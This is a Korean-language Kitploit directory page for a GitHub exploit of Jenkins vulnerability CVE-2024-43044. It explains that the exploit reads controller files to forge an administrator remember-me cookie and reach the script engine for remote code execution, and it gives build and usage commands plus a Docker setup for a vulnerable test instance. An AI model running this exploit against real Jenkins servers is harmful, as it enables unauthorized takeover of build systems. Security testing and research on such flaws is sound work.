Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-43044-jenkins — Jenkins의 취약점 CVE-2024-43044에 대한 익스플로잇 | Kitploit
도구/GitHubGitHub/convisolabs/cve-2024-43044-jenkins
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubconvisolabs/cve-2024-43044-jenkins

CVE-2024-43044-jenkins

Jenkins의 취약점 CVE-2024-43044에 대한 익스플로잇

저장소 보기
18624342년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

소개

이것은 CVE-2024-43044에 대한 익스플로잇입니다. 이 취약점은 에이전트가 컨트롤러에서 파일을 가져올 수 있도록 하는 임의 파일 읽기입니다.

이 익스플로잇은 취약점을 이용해 파일을 읽어 관리자 계정의 remember-me 쿠키를 위조하고 Jenkins 스크립팅 엔진에 접근 권한을 얻습니다.

전체 분석 내용은 https://blog.convioappsec.com/en/analysis-of-cve-2024-43044/ 에서 확인하세요.

익스플로잇 빌드

root@kitploit:~
mvn package

익스플로잇 실행

root@kitploit:~
Exploit Usages:
    java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
    java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
    java -jar exploit.jar mode_attach <cmd>

테스트

다음과 같이 Docker를 사용해 취약한 버전에서 테스트할 수 있습니다:

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

Jenkins가 실행 중이면 에이전트를 설정하세요.

컨트롤러/에이전트 연결은 기본(URL, 노드 이름, 시크릿 사용) 또는 SSH를 통해 가능합니다.

데모

RCE.

참고 자료

https://www.jenkins.io/security/advisory/2024-08-07/

도구 다운로드